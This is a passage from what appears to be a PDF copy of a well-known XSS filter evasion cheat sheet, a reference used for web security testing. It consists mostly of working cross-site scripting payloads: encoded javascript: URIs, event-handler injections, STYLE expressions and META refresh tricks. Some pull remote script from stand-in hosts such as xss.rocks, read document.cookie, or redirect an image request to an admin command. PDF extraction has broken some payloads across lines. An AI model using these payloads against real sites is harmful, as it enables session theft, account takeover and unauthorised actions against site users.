Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di
Paola, Roman Shafigullin, Lewis Ardern, Michał
Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin
Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł
Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan,
p4fg, diofeher

You can contribute to this cheat sheet by creating a new issue or updating the
JSON and creating a pull request

javascript:/*--></title></style></textarea></script></
xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Image XSS using the JavaScript directive
Image XSS using the JavaScript directive (IE7.0 doesn’t support
the JavaScript directive in context of an image, but it does in other
contexts, but the following show the principles that would work in
other tags as well:
<IMG SRC="javascript:alert('XSS');">
No quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>
Case insensitive XSS attack vector
<IMG SRC=JaVaScRiPt:alert('XSS')>
HTML entities
The semicolons are required for this to work:
<IMG SRC=javascript:alert("XSS")>
Grave accent obfuscation
If you need to use both double and single quotes you can use a
grave accent to encapsulate the JavaScript string - this is also
useful because lots of cross site scripting filters don’t know about
grave accents:
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Malformed A tags
Skip the HREF attribute and get to the meat of the XXS…
Submitted by David Cross ~ Verified on Chrome
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
or Chrome loves to replace missing quotes for you… if you ever get
stuck just leave them off and Chrome will put them in the right
place and fix your missing quotes on a URL or script.
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
Malformed IMG tags
Originally found by Begeek (but cleaned up and shortened to work
in all browsers), this XSS vector uses the relaxed rendering engine
to create our XSS vector within an IMG tag that should be
encapsulated within quotes. I assume this was originally meant to
correct sloppy coding. This would make it significantly more difficult
to correctly parse apart an HTML tags:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
fromCharCode
If no quotes of any kind are allowed you can eval() a
fromCharCode in JavaScript to create any XSS vector you need:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Default SRC tag to get past filters that check SRC domain
This will bypass most SRC domain filters. Inserting javascript in an
event method will also apply to any HTML tag type injection that
uses elements like Form, Iframe, Input, Embed etc. It will also allow
any relevant event for the tag type to be substituted
like onblur, onclick giving you an extensive amount of variations
for many injections listed here. Submitted by David Cross .
Edited by Abdullah Hussam(@Abdulahhusam).
<IMG SRC=# onmouseover="alert('xxs')">
Default SRC tag by leaving it empty
<IMG SRC= onmouseover="alert('xxs')">
Default SRC tag by leaving it out entirely
<IMG onmouseover="alert('xxs')">
On error alert
<IMG SRC=/
onerror="alert(String.fromCharCode(88,83,83))"></img>
IMG onerror and javascript alert encode
<img src=x
onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099
&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108
&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083
&#0000083&#0000039&#0000041">
Decimal HTML character references
All of the XSS examples that use a javascript: directive inside of
an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko
rendering engine mode).
<IMG SRC=javascrip&#1
16;:alert('XSS&
#39;)>
Decimal HTML character references without trailing semicolons
This is often effective in XSS that attempts to look for “&#XX;”,
since most people don’t know about padding - up to 7 numeric
characters total. This is also useful against people who decode
against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which
incorrectly assumes a semicolon is required to terminate a html
encoded string (I’ve seen this in the wild):
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099
&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108
&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083
&#0000083&#0000039&#0000041>
Hexadecimal HTML character references without trailing semicolons
This is also a viable XSS attack against the above string
$tmp_string=~ s/.*\&#(\d+);.*/$1/; which assumes that there is a
numeric character following the pound symbol - which is not true
with hex HTML characters).
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x6
1&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Embedded tab
Used to break up the cross site scripting attack:
<IMG SRC="jav ascript:alert('XSS');">
Embedded Encoded tab
Use this one to break up XSS :
<IMG SRC="jav	ascript:alert('XSS');">
Embedded newline to break up XSS
Some websites claim that any of the chars 09-13 (decimal) will
work for this attack. That is incorrect. Only 09 (horizontal tab), 10
(newline) and 13 (carriage return) work. See the ascii chart for
more details. The following four XSS examples illustrate this vector:
<IMG SRC="jav
ascript:alert('XSS');">
Embedded carriage return to break up XSS
(Note: with the above I am making these strings longer than they
have to be because the zeros could be omitted. Often I’ve seen
filters that assume the hex and dec encoding has to be two or three
characters. The real rule is 1-7 characters.):
<IMG SRC="javascript:alert('XSS');">
Null breaks up JavaScript directive
Null chars also work as XSS vectors but not like above, you need
to inject them directly using something like Burp Proxy or
use %00 in the URL string or if you want to write your own injection
tool you can either use vim (^V^@ will produce a null) or the
following program to generate it into a text file. Okay, I lied again,
older versions of Opera (circa 7.11 on Windows) were vulnerable to
one additional char 173 (the soft hypen control char). But the null
char %00 is much more useful and helped me bypass certain real
world filters with a variation on this example:
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Spaces and meta chars before the JavaScript in images for XSS
This is useful if the pattern match doesn’t take into account spaces
in the word javascript: -which is correct since that won’t render-
and makes the false assumption that you can’t have a space
between the quote and the javascript: keyword. The actual
reality is you can have any char from 1-32 in decimal:
<IMG SRC="  javascript:alert('XSS');">
Non-alpha-non-digit XSS
The Firefox HTML parser assumes a non-alpha-non-digit is not
valid after an HTML keyword and therefor considers it to be a
whitespace or non-valid token after an HTML tag. The problem is
that some XSS filters assume that the tag they are looking for is
broken up by whitespace. For example \<SCRIPT\\s != \
<SCRIPT/XSS\\s:
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
Based on the same idea as above, however,expanded on it, using
Rnake fuzzer. The Gecko rendering engine allows for any
character other than letters, numbers or encapsulation chars (like
quotes, angle brackets, etc…) between the event handler and the
equals sign, making it easier to bypass cross site scripting blocks.
Note that this also applies to the grave accent char as seen here:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Yair Amit brought this to my attention that there is slightly different
behavior between the IE and Gecko rendering engines that allows
just a slash between the tag and the parameter with no spaces.
This could be useful if the system does not allow spaces.
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
Extraneous open brackets
Submitted by Franz Sedlmaier, this XSS vector could defeat certain
detection engines that work by first using matching pairs of open
and close angle brackets and then by doing a comparison of the
tag inside, instead of a more efficient algorythm like Boyer-Moore
that looks for entire string matches of the open angle bracket and
associated tag (post de-obfuscation, of course). The double slash
comments out the ending extraneous bracket to supress a
JavaScript error:
<<SCRIPT>alert("XSS");//\<</SCRIPT>
No closing script tags
In Firefox and Netscape 8.1 in the Gecko rendering engine mode
you don’t actually need the \></SCRIPT> portion of this Cross Site
Scripting vector. Firefox assumes it’s safe to close the HTML tag
and add closing tags for you. How thoughtful! Unlike the next one,
which doesn’t effect Firefox, this does not require any additional
HTML below it. You can add quotes if you need to, but they’re not
needed generally, although beware, I have no idea what the HTML
will end up looking like once this is injected:
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
Protocol resolution in script tags
This particular variant was submitted by Łukasz Pilorz and was
based partially off of Ozh’s protocol resolution bypass below. This
cross site scripting example works in IE, Netscape in IE rendering
mode and Opera if you add in a </SCRIPT> tag at the end.
However, this is especially useful where space is an issue, and of
course, the shorter your domain, the better. The “.j” is valid,
regardless of the encoding type because the browser knows it in
context of a SCRIPT tag.
<SCRIPT SRC=//xss.rocks/.j>
Half open HTML/JavaScript XSS vector
Unlike Firefox the IE rendering engine doesn’t add extra data to
you page, but it does allow the javascript: directive in images. This
is useful as a vector because it doesn’t require a close angle
bracket. This assumes there is any HTML tag below where you are
injecting this cross site scripting vector. Even though there is no
close “>” tag the tags below it will close it. A note: this does mess
up the HTML, depending on what HTML is beneath it. It gets
around the following NIDS regex: /((\\%3D)|(=))\[^\\n\]\
*((\\%3C)|\<)\[^\\n\]+((\\%3E)|\>)/ because it doesn’t
require the end “>”. As a side note, this was also affective against a
real world XSS filter I came across using an open
ended <IFRAME tag instead of an <IMG tag:
<IMG SRC="`<javascript:alert>`('XSS')"
Double open angle brackets
Using an open angle bracket at the end of the vector instead of a
close angle bracket causes different behavior in Netscape Gecko
rendering. Without it, Firefox will work but Netscape won’t:
<iframe src=http://xss.rocks/scriptlet.html <
Escaping JavaScript escapes
When the application is written to output some user information
inside of a JavaScript like the following: <SCRIPT>var
a="$ENV{QUERY\_STRING}";</SCRIPT> and you want to inject
your own JavaScript into it but the server side application escapes
certain quotes you can circumvent that by escaping their escape
character. When this gets injected it will read <SCRIPT>var
a="\\\\";alert('XSS');//";</SCRIPT> which ends up un-
escaping the double quote and causing the Cross Site Scripting
vector to fire. The XSS locator uses this method.:
\";alert('XSS');//
An alternative, if correct JSON or Javascript escaping has been
applied to the embedded data but not HTML encoding, is to finish
the script block and start your own:
</script><script>alert('XSS');</script>
End title tag
This is a simple XSS vector that closes <TITLE> tags, which can
encapsulate the malicious cross site scripting attack:
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
IMG lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
List-style-image
Fairly esoteric issue dealing with embedding images for bulleted
lists. This will only work in the IE rendering engine because of the
JavaScript directive. Not a particularly useful cross site scripting
vector:
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</
STYLE><UL><LI>XSS</br>
VBscript in an image
<IMG SRC='vbscript:msgbox("XSS")'>
Livescript (older versions of Netscape only)
<IMG SRC="livescript:[code]">
SVG object tag
<svg/onload=alert('XSS')>
ECMAScript 6
Set.constructor`alert\x28document.domain\x29```
BODY tag
Method doesn’t require using any variants
of javascript: or <SCRIPT... to accomplish the XSS attack).
Dan Crowley additionally noted that you can put a space before the
equals sign (onload= != onload =):
<BODY ONLOAD=alert('XSS')>
Event Handlers
It can be used in similar XSS attacks to the one above (this is the
most comprehensive list on the net, at the time of this writing).
Thanks to Rene Ledosquet for the HTML+TIME updates.
The Dottoro Web Reference also has a nice list of events in
JavaScript.

1. FSCommand() (attacker can use this when executed from

within an embedded Flash object)
2. onAbort() (when user aborts the loading of an image)
3. onActivate() (when object is set as the active element)
4. onAfterPrint() (activates after user prints or previews print
job)
5. onAfterUpdate() (activates on data object after updating
data in the source object)
6. onBeforeActivate() (fires before the object is set as the
active element)
7. onBeforeCopy() (attacker executes the attack string right
before a selection is copied to the clipboard - attackers can
do this with the execCommand("Copy") function)
8. onBeforeCut() (attacker executes the attack string right
before a selection is cut)
9. onBeforeDeactivate() (fires right after the activeElement is
changed from the current object)
10. onBeforeEditFocus() (Fires before an object
contained in an editable element enters a UI-activated state
or when an editable container object is control selected)
11. onBeforePaste() (user needs to be tricked into
pasting or be forced into it using
the execCommand("Paste") function)
12. onBeforePrint() (user would need to be tricked into
printing or attacker could use
the print() or execCommand("Print") function).
13. onBeforeUnload() (user would need to be tricked into
closing the browser - attacker cannot unload windows unless
it was spawned from the parent)
14. onBeforeUpdate() (activates on data object before
updating data in the source object)
15. onBegin() (the onbegin event fires immediately when
the element’s timeline begins)
16. onBlur() (in the case where another popup is loaded
and window looses focus)
17. onBounce() (fires when the behavior property of the
marquee object is set to “alternate” and the contents of the
marquee reach one side of the window)
18. onCellChange() (fires when data changes in the data
provider)
19. onChange() (select, text, or TEXTAREA field loses
focus and its value has been modified)
20. onClick() (someone clicks on a form)
21. onContextMenu() (user would need to right click on
attack area)
22. onControlSelect() (fires when the user is about to
make a control selection of the object)
23. onCopy() (user needs to copy something or it can be
exploited using the execCommand("Copy") command)
24. onCut() (user needs to copy something or it can be
exploited using the execCommand("Cut") command)
25. onDataAvailable() (user would need to change data
in an element, or attacker could perform the same function)
26. onDataSetChanged() (fires when the data set
exposed by a data source object changes)
27. onDataSetComplete() (fires to indicate that all data is
available from the data source object)
28. onDblClick() (user double-clicks a form element or a
link)
29. onDeactivate() (fires when the activeElement is
changed from the current object to another object in the
parent document)
30. onDrag() (requires that the user drags an object)
31. onDragEnd() (requires that the user drags an object)
32. onDragLeave() (requires that the user drags an object
off a valid location)
33. onDragEnter() (requires that the user drags an object
into a valid location)
34. onDragOver() (requires that the user drags an object
into a valid location)
35. onDragDrop() (user drops an object (e.g. file) onto the
browser window)
36. onDragStart() (occurs when user starts drag
operation)
37. onDrop() (user drops an object (e.g. file) onto the
browser window)
38. onEnd() (the onEnd event fires when the timeline
ends.
39. onError() (loading of a document or image causes an
error)
40. onErrorUpdate() (fires on a databound object when
an error occurs while updating the associated data in the
data source object)
41. onFilterChange() (fires when a visual filter
completes state change)
42. onFinish() (attacker can create the exploit when
marquee is finished looping)
43. onFocus() (attacker executes the attack string when
the window gets focus)
44. onFocusIn() (attacker executes the attack string when
window gets focus)
45. onFocusOut() (attacker executes the attack string
when window looses focus)
46. onHashChange() (fires when the fragment identifier
part of the document’s current address changed)
47. onHelp() (attacker executes the attack string when
users hits F1 while the window is in focus)
48. onInput() (the text content of an element is changed
through the user interface)
49. onKeyDown() (user depresses a key)
50. onKeyPress() (user presses or holds down a key)
51. onKeyUp() (user releases a key)
52. onLayoutComplete() (user would have to print or print
preview)
53. onLoad() (attacker executes the attack string after the
window loads)
54. onLoseCapture() (can be exploited by
the releaseCapture() method)
55. onMediaComplete() (When a streaming media file is
used, this event could fire before the file starts playing)
56. onMediaError() (User opens a page in the browser
that contains a media file, and the event fires when there is a
problem)
57. onMessage() (fire when the document received a
message)
58. onMouseDown() (the attacker would need to get the
user to click on an image)
59. onMouseEnter() (cursor moves over an object or
area)
60. onMouseLeave() (the attacker would need to get the
user to mouse over an image or table and then off again)
61. onMouseMove() (the attacker would need to get the
user to mouse over an image or table)
62. onMouseOut() (the attacker would need to get the user
to mouse over an image or table and then off again)
63. onMouseOver() (cursor moves over an object or area)
64. onMouseUp() (the attacker would need to get the user
to click on an image)
65. onMouseWheel() (the attacker would need to get the
user to use their mouse wheel)
66. onMove() (user or attacker would move the page)
67. onMoveEnd() (user or attacker would move the page)
68. onMoveStart() (user or attacker would move the
page)
69. onOffline() (occurs if the browser is working in online
mode and it starts to work offline)
70. onOnline() (occurs if the browser is working in offline
mode and it starts to work online)
71. onOutOfSync() (interrupt the element’s ability to play
its media as defined by the timeline)
72. onPaste() (user would need to paste or attacker could
use the execCommand("Paste") function)
73. onPause() (the onpause event fires on every element
that is active when the timeline pauses, including the body
element)
74. onPopState() (fires when user navigated the session
history)
75. onProgress() (attacker would use this as a flash
movie was loading)
76. onPropertyChange() (user or attacker would need to
change an element property)
77. onReadyStateChange() (user or attacker would need
to change an element property)
78. onRedo() (user went forward in undo transaction
history)
79. onRepeat() (the event fires once for each repetition of
the timeline, excluding the first full cycle)
80. onReset() (user or attacker resets a form)
81. onResize() (user would resize the window; attacker
could auto initialize with something
like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
82. onResizeEnd() (user would resize the window;
attacker could auto initialize with something
like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
83. onResizeStart() (user would resize the window;
attacker could auto initialize with something
like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
84. onResume() (the onresume event fires on every
element that becomes active when the timeline resumes,
including the body element)
85. onReverse() (if the element has a repeatCount greater
than one, this event fires every time the timeline begins to
play backward)
86. onRowsEnter() (user or attacker would need to
change a row in a data source)
87. onRowExit() (user or attacker would need to change a
row in a data source)
88. onRowDelete() (user or attacker would need to delete
a row in a data source)
89. onRowInserted() (user or attacker would need to
insert a row in a data source)
90. onScroll() (user would need to scroll, or attacker
could use the scrollBy() function)
91. onSeek() (the onreverse event fires when the timeline
is set to play in any direction other than forward)
92. onSelect() (user needs to select some text - attacker
could auto initialize with something
like: window.document.execCommand("SelectAll");)
93. onSelectionChange() (user needs to select some
text - attacker could auto initialize with something
like: window.document.execCommand("SelectAll");)
94. onSelectStart() (user needs to select some text -
attacker could auto initialize with something
like: window.document.execCommand("SelectAll");)
95. onStart() (fires at the beginning of each marquee
loop)
96. onStop() (user would need to press the stop button or
leave the webpage)
97. onStorage() (storage area changed)
98. onSyncRestored() (user interrupts the element’s
ability to play its media as defined by the timeline to fire)
99. onSubmit() (requires attacker or user submits a form)
100. onTimeError() (user or attacker sets a time property,
such as dur, to an invalid value)
101. onTrackChange() (user or attacker changes track in a
playList)
102. onUndo() (user went backward in undo transaction
history)
103. onUnload() (as the user clicks any link or presses the
back button or attacker forces a click)
104. onURLFlip() (this event fires when an Advanced
Streaming Format (ASF) file, played by a HTML+TIME
(Timed Interactive Multimedia Extensions) media tag,
processes script commands embedded in the ASF file)
105. seekSegmentTime() (this is a method that locates the
specified point on the element’s segment time line and
begins playing from that point. The segment consists of one
repetition of the time line including reverse play using the
AUTOREVERSE attribute.)

BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
& JavaScript includes
<BR SIZE="&{alert('XSS')}">
STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Remote style sheet
Using something as simple as a remote style sheet you can include
your XSS as the style parameter can be redefined using an
embedded expression. This only works in IE and Netscape 8.1+ in
IE rendering engine mode. Notice that there is nothing on the page
to show that there is included JavaScript. Note: With all of these
remote style sheet examples they use the body tag, so it won’t
work unless there is some content on the page other than the
vector itself, so you’ll need to add a single letter to the page to
make it work if it’s an otherwise blank page:
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
Remote style sheet part 2
This works the same as above, but uses a <STYLE> tag instead of
a <LINK> tag). A slight variation on this vector was used to hack
Google Desktop. As a side note, you can remove the
end </STYLE> tag if there is HTML immediately after the vector to
close it. This is useful if you cannot have either an equals sign or a
slash in your cross site scripting attack, which has come up at least
once in the real world:
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
Remote style sheet part 3
This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky.
According to RFC2616 setting a link header is not part of the
HTTP1.1 spec, however some browsers still allow it (like Firefox
and Opera). The trick here is that I am setting a header (which is
basically no different than in the HTTP header saying Link:
<http://xss.rocks/xss.css>; REL=stylesheet) and the
remote style sheet with my cross site scripting vector is running the
JavaScript, which is not supported in FireFox:
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; RE
L=stylesheet">
Remote style sheet part 4
This only works in Gecko rendering engines and works by binding
an XUL file to the parent page. I think the irony here is that
Netscape assumes that Gecko is safer and therefor is vulnerable to
this for the vast majority of sites:
<STYLE>BODY{-moz-binding:url("http://xss.rocks/
xssmoz.xml#xss")}</STYLE>
STYLE tags with broken up JavaScript for XSS
This XSS at times sends IE into an infinite loop of alerts:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
STYLE attribute using a comment to break up expression
Created by Roman Ivanov
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
IMG STYLE with expression
This is really a hybrid of the above XSS vectors, but it really does
show how hard STYLE tags can be to parse apart, like above this
can send IE into a loop:
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
STYLE tag (Older versions of Netscape only)
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
STYLE tag using background-image
<STYLE>.XSS{background-
image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
STYLE tag using background
<STYLE type="text/
css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<STYLE
type="text/css">BODY{background:url("<javascript:alert>('XSS')"
)}</STYLE>
Anonymous HTML with STYLE attribute
IE6.0 and Netscape 8.1+ in IE rendering engine mode don’t really
care if the HTML tag you build exists or not, as long as it starts with
an open angle bracket and a letter:
<XSS STYLE="xss:expression(alert('XSS'))">
Local htc file
This is a little different than the above two cross site scripting
vectors because it uses an .htc file which must be on the same
server as the XSS vector. The example file works by pulling in the
JavaScript and running it as part of the style attribute:
<XSS STYLE="behavior: url(xss.htc);">
US-ASCII encoding
US-ASCII encoding (found by Kurt Huwig).This uses malformed
ASCII encoding with 7 bits instead of 8. This XSS may bypass
many content filters but only works if the host transmits in US-
ASCII encoding, or if you set the encoding yourself. This is more
useful against web application firewall cross site scripting evasion
than it is server side filter evasion. Apache Tomcat is the only
known server that transmits in US-ASCII encoding.
¼script¾alert(¢XSS¢)¼/script¾
META
The odd thing about meta refresh is that it doesn’t send a referrer in
the header - so it can be used for certain types of attacks where
you need to get rid of referring URLs:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS
');">
META using data
Directive URL scheme. This is nice because it also doesn’t have
anything visibly that has the word SCRIPT or the JavaScript
directive in it, because it utilizes base64 encoding. Please see RFC
2397 for more details or go here or here to encode your own. You
can also use the XSS calculator below if you just want to encode
raw HTML or JavaScript as it has a Base64 encoding method:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64
,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
META with additional URL parameter
If the target website attempts to see if the URL
contains <http://>; at the beginning you can evade it with the
following technique (Submitted by Moritz Naumann):
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascri
pt:alert('XSS');">
IFRAME
If iframes are allowed there are a lot of other XSS problems as well:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
IFRAME Event based
IFrames and most other elements can use event based mayhem
like the following… (Submitted by: David Cross)
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
FRAME
Frames have the same sorts of XSS problems as iframes
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
TD
Just like above, TD’s are vulnerable to BACKGROUNDs containing
JavaScript XSS vectors:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
DIV

DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV background-image with unicoded XSS exploit
This has been modified slightly to obfuscate the url parameter. The
original vulnerability was found by Renaud Lifchitz as a vulnerability
in Hotmail:
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
DIV background-image plus extra characters
Rnaske built a quick XSS fuzzer to detect any erroneous
characters that are allowed after the open parenthesis but before
the JavaScript directive in IE and Netscape 8.1 in secure site
mode. These are in decimal but you can include hex and add
padding of course. (Any of the following chars can be used: 1-32,
34, 39, 160, 8192-8.13, 12288, 65279):
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV expression
A variant of this was effective against a real world cross site
scripting filter using a newline between the colon and “expression”:
<DIV STYLE="width: expression(alert('XSS'));">
Downlevel-Hidden block
Only works in IE5.0 and later and Netscape 8.1 in IE rendering
engine mode). Some websites consider anything inside a comment
block to be safe and therefore does not need to be removed, which
allows our Cross Site Scripting vector. Or the system could add
comment tags around something to attempt to render it harmless.
As we can see, that probably wouldn’t do the job:

BASE tag
Works in IE and Netscape 8.1 in safe mode. You need the // to
comment out the next characters so you won’t get a JavaScript
error and your XSS tag will render. Also, this relies on the fact that
the website uses dynamically placed images
like images/image.jpg rather than full paths. If the path includes a
leading forward slash like /images/image.jpg you can remove
one slash from this vector (as long as there are two to begin the
comment this will work):
<BASE HREF="javascript:alert('XSS');//">
OBJECT tag
If they allow objects, you can also inject virus payloads to infect the
users, etc. and same with the APPLET tag). The linked file is
actually an HTML file that can contain your XSS:
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/
scriptlet.html"></OBJECT>
Using an EMBED tag you can embed a Flash movie that contains XSS
Click here for a demo: http://ha.ckers.org/xss.swf
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="alw
ays"></EMBED>
If you add the
attributes allowScriptAccess="never" and allownetworking="
internal" it can mitigate this risk (thank you to Jonathan Vanasco
for the info).
You can EMBED SVG which can contain your XSS vector
This example only works in Firefox, but it’s better than the above
vector in Firefox because it does not require the user to have Flash
turned on or installed. Thanks to nEUrOO for this one.
<EMBED SRC="data:image/
svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzI
wMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtb
G5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9
uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZ
D0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScript
Access="always"></EMBED>
Using ActionScript inside flash can obfuscate your XSS vector
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
XML data island with CDATA obfuscation
This XSS attack works only in IE and Netscape 8.1 in IE rendering
engine mode) - vector found by Sec Consult while auditing Yahoo:
<XML ID="xss"><I><B><IMG SRC="javas
PHP
Requires PHP to be installed on the server to use this XSS vector.
Again, if you can run any scripts remotely like this, there are
probably much more dire issues:
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
IMG Embedded commands
This works when the webpage where this is injected (like a web-
board) is behind password protection and that password protection
works with other commands on the same domain. This can be used
to delete users, add users (if the user who visits the page is an
administrator), send credentials elsewhere, etc…. This is one of the
lesser used but more useful XSS vectors:
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
IMG Embedded commands part II
This is more scary because there are absolutely no identifiers that
make it look suspicious other than it is not hosted on your own
domain. The vector uses a 302 or 304 (others work too) to redirect
the image back to a command. So a normal <IMG
SRC="httx://badguy.com/a.jpg"> could actually be an attack
vector to run commands as the user who views the image link.
Here is the .htaccess (under Apache) line to accomplish the vector
(thanks to Timo for part of this):
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Cookie manipulation
Admittedly this is pretty obscure but I have seen a few examples
where <META is allowed and you can use it to overwrite cookies.
There are other examples of sites where instead of fetching the
username from a database it is stored inside of a cookie to be
displayed only to the user who visits the page. With these two
scenarios combined you can modify the victim’s cookie which will
be displayed back to them as JavaScript (you can also use this to
log people out or change their user states, get them to log in as
you, etc…):
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XS
S')</SCRIPT>">
UTF-7 encoding
If the page that the XSS resides on doesn’t provide a page charset
header, or any browser that is set to UTF-7 encoding can be
exploited with the following (Thanks to Roman Ivanov for this one).
Click here for an example (you don’t need the charset statement if
the user’s browser is set to auto-detect and there is no overriding
content-types on the page in Internet Explorer and Netscape 8.1 in
IE rendering engine mode). This does not work in any modern
browser without changing the encoding type which is why it is
marked as completely unsupported. Watchfire found this hole in
Google’s custom 404 script.:
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; chars
et=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/
SCRIPT+AD4-
XSS using HTML quote encapsulation
This was tested in IE, your mileage may vary. For performing XSS
on sites that allow <SCRIPT> but don’t allow <SCRIPT SRC... by
way of a regex filter /\<script\[^\>\]+src/i:
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
For performing XSS on sites that allow <SCRIPT> but don’t allow \
<script src... by way of a regex filter /\<script((\\s+\\w+
(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\
s\*|\\s\*)src/i (this is an important one, because I’ve seen this
regex in the wild):
<SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
Another XSS to evade the same filter, /\<script((\\s+\\w+(\\
s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\
*|\\s\*)src/i:
<SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT>
Yet another XSS to evade the same filter, /\<script((\\s+\\w+
(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\
s\*|\\s\*)src/i. I know I said I wasn’t goint to discuss mitigation
techniques but the only thing I’ve seen work for this XSS example if
you still want to allow <SCRIPT> tags but not remote script is a state
machine (and of course there are other ways to get around this if
they allow <SCRIPT> tags):
<SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT>
And one last XSS attack to evade, /\<script((\\s+\\w+(\\s\
*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\
s\*)src/i using grave accents (again, doesn’t work in Firefox):
<SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT>
Here’s an XSS example that bets on the fact that the regex won’t
catch a matching pair of quotes but will rather find any quotes to
terminate a parameter string improperly:
<SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT>
This XSS still worries me, as it would be nearly impossible to stop
this without blocking all active content:
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://
xss.rocks/xss.js"></SCRIPT>
URL string evasion
Assuming http://www.google.com/ is programmatically
disallowed:
IP versus hostname
<A HREF="http://66.102.7.147/">XSS</A>
URL encoding
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F
%6D">XSS</A>
